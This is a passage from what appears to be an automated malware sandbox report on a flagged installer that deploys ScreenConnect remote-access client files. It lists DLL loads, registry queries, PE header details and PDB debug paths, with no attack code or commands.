                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.ClientService.exe Section loaded: profapi.dll
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\DTABL3OL.HY1\DO55ETEY.OE4\scre..tion_25b0fbb6ef7eb094_0018.0004_ad8ad592b5337ff5\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: certificate valid
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: SecuriteInfo.com.W32.Lolbas.A.tr.11988.23512.exe
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: %%.pdb(s( source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb> source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.Windows.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb%)Sw source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb` source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb1 source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: System.Xml.ni.pdbRSDS# source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdbROF source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000F09000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: entService.pdbr source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.Core.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: System.Core.pdb0 source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BF42E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF056000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3043338622.000001D2BF4F3000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871815455.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871339597.0000000000ED0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.exe, 0000000A.00000002.1831463096.0000000004FC2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000000.1417484650.00000000004DD000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: mscorlib.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdby source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1412836393.0000000000512000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: \??\C:\Windows\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3043338622.000001D2BEEA8000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.1871561986.0000000002592000.00000002.00000001.01000000.00000013.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.ClientService.pdb source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\ScreenConnect.Core.pdbul:YGvd source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbH9 source: ScreenConnect.ClientService.exe, 0000000A.00000002.1831984228.00000000056AB000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: System.Xml.ni.pdb source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdbl source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830485738.0000000000E96000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ni.pdbRSDS source: WER494D.tmp.dmp.13.dr
                  Source: Binary string: HP+nXC:\Windows\ScreenConnect.ClientService.pdbP source: ScreenConnect.ClientService.exe, 0000000A.00000002.1830358109.0000000000B78000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: ScreenConnect.ClientService.pdb source: WER494D.tmp.dmp.13.dr
